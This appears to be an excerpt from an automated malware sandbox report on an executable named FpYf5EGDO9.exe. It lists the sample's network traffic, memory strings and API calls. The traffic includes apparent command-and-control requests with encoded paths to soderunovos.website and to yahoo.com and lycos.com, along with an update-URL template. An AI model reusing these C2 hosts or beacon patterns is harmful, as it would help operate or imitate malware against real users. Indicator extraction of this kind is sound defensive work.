                      Source: global trafficHTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: lycos.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
                      Source: global trafficHTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
                      Source: global trafficHTTP traffic detected: GET /images/ULsdPIVaor8tHILk/0ulmqbrH6ITnKv9/hjuxJRtL9AnqjM_2F9/31KQzlJ4A/RADn_2B9K7qN4OIWzhqt/e9pg3qo9NJvDplsJyu_/2BINJhitzziIxZ5FGe3dQs/qXLEJMLfrql94/pbynvtsD/hbcZQz4rDORcqa20GNWm_2B/AEaRjxdvZi/WJoDjLGRG7wMNfA10/47LdHNX1Ihp_/2F5oAPCKnfW/OXUd0uJQ9lRCE3/_2Bk_2BnDXgKUHje_2FRL/1haIbjYdfbhVAxGo/8KwtG_2Fq/c.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: mail.yahoo.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: login.yahoo.com
                      Source: Joe Sandbox ViewASN Name: M247GB M247GB
                      Source: Joe Sandbox ViewIP Address: 89.44.9.140 89.44.9.140
                      Source: Joe Sandbox ViewIP Address: 74.6.143.26 74.6.143.26
                      Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 0000000E.00000003.441167820.000001A9988C5000.00000004.00000001.sdmpString found in binary or memory: http://crl.micro
                      Source: FpYf5EGDO9.exe, 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, control.exe, 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, rundll32.exe, 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, cmd.exe, 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cmg
                      Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.co/xa
                      Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.ux
                      Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.uxs
                      Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobp/
                      Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobp/3
                      Source: RuntimeBroker.exe, 00000024.00000002.818940023.000001EAE2102000.00000004.00000001.sdmpString found in binary or memory: http://ns.micro/1
                      Source: RuntimeBroker.exe, 00000023.00000000.599967225.00000163C251A000.00000004.00000001.sdmpString found in binary or memory: http://ns.micro/1S
                      Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 0000000E.00000002.545761231.000001A980231000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lan
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=8vo
                      Source: powershell.exe, 0000000E.00000002.546951449.000001A980439000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 0000000E.00000002.591569483.000001A990292000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmpString found in binary or memory: https://qoderunovos.website
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmpString found in binary or memory: https://soderunovos.website
                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: https://soderunovos.website/
                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: https://soderunovos.website/jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3L
                      Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmpString found in binary or memory: https://soderunovos.website/jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/
                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: https://soderunovos.website/jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctW
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmpString found in binary or memory: https://soderunovos.websitehttps://qoderunovos.websiteo
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: https://www.yahoo.com/
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: https://www.yahoo.com//
                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fj
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp, FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZiz
                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: https://www.yahoo.com/R
                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: https://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqc
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: https://www.yahoo.com/u
                      Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmpString found in binary or memory: https://yahoo.com/
                      Source: FpYf5EGDO9.exe, 00000000.00000002.510452658.0000000002219000.00000004.00000001.sdmpString found in binary or memory: https://yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHL
                      Source: unknownDNS traffic detected: queries for: yahoo.com
                      Source: C:\Users\user\Desktop\FpYf5EGDO9.exeCode function: 0_2_03C45988 ResetEvent,ResetEvent,lstrcat,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,0_2_03C45988
                      Source: global trafficHTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: yahoo.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Connection: Keep-AliveCache-Control: no-cacheHost: www.yahoo.comCookie: B=emaekhlgpqi05&b=3&s=ke
                      Source: global trafficHTTP traffic detected: GET /jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctWO8vLxko/alAFtnlNlG6Q7/I30RLNMi/fUrGHRWZ_2Br2a8odLCOSy2/Pp0uf39xNF/zw_2Bgb01eHiph9fS/HUtF_2BI_2FW/KJsziSAbwfK/PI_2FrcgGvn_2F/if7htk49j1cWEP5dTbASH/YfWHdUallNi/oU.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
                      Source: global trafficHTTP traffic detected: GET /jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: soderunovos.websiteConnection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
                      Source: global trafficHTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: lycos.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
                      Source: global trafficHTTP traffic detected: GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg/ HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: www.lycos.com
                      Source: global trafficHTTP traffic detected: GET /images/ULsdPIVaor8tHILk/0ulmqbrH6ITnKv9/hjuxJRtL9AnqjM_2F9/31KQzlJ4A/RADn_2B9K7qN4OIWzhqt/e9pg3qo9NJvDplsJyu_/2BINJhitzziIxZ5FGe3dQs/qXLEJMLfrql94/pbynvtsD/hbcZQz4rDORcqa20GNWm_2B/AEaRjxdvZi/WJoDjLGRG7wMNfA10/47LdHNX1Ihp_/2F5oAPCKnfW/OXUd0uJQ9lRCE3/_2Bk_2BnDXgKUHje_2FRL/1haIbjYdfbhVAxGo/8KwtG_2Fq/c.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: mail.yahoo.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Connection: Keep-AliveCache-Control: no-cacheHost: login.yahoo.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 23 Nov 2021 19:59:01 GMTp3p: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"cache-control: privatex-content-type-options: nosniffcontent-type: text/html; charset=UTF-8x-envoy-upstream-service-time: 14server: ATSContent-Length: 1052Age: 1Connection: closeStrict-Transport-Security: max-age=31536000Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.com https://*.oath.com https://*.search.yahoo.com https://*.search.aol.com https://*.search.huffpost.com https://*.verizonmedia.com https://*.publishing.oath.com https://*.autoblog.com; sandbox allow-forms allow-same-origin allow-scripts allow-popups allow-popups-to-escape-sandbox allow-presentation; report-uri https://csp.yahoo.com/beacon/csp?src=ats&site=frontpage&region=US&lang=en-US&device=desktop&yrid=8voena9gpqi06&partner=;X-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=block
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Nov 2021 20:01:39 GMTServer: ApacheContent-Security-Policy: frame-ancestors 'self' *.lycos.comX-Powered-By: PHP/7.2.24Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: *.www.yahoo.com equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: *.www.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: *.www.yahoo.comT equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: +www.yahoo.co equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: +www.yahoo.com equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmpString found in binary or memory: <noscript><META http-equiv="refresh" content="0;URL='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZizh9TthhcPc%2fxT0iS3Qjl7y%2fkpH0MqC4dszB3H%2fHWmjHuRTfALKqcqKHLe5h%2f5KAnfOS4i_2BLVi7%2f2L64u5xwvTf3sXp%2fUrLoeHhSH12GKB9jsQ%2f3izuuqgp_%2f2BeydbeuNgrndFBMAfCQ%2fMxSWsDqksAzA_2F87xp%2fN1In9Bv1C1YQS1KkwHJ10H%2fTNNv.crw'"></noscript> equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: https://www.yahoo.com/ GlobalSign Root CA-R2 equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: https://www.yahoo.com/ equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: https://www.yahoo.com// equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: https://www.yahoo.com/R equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: https://www.yahoo.com/[ equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmpString found in binary or memory: https://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: https://www.yahoo.com/u equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmpString found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crwv/CCpK equals www.yahoo.com (Yahoo)
                      Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmpString found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crwx equals www.yahoo.com (Yahoo)
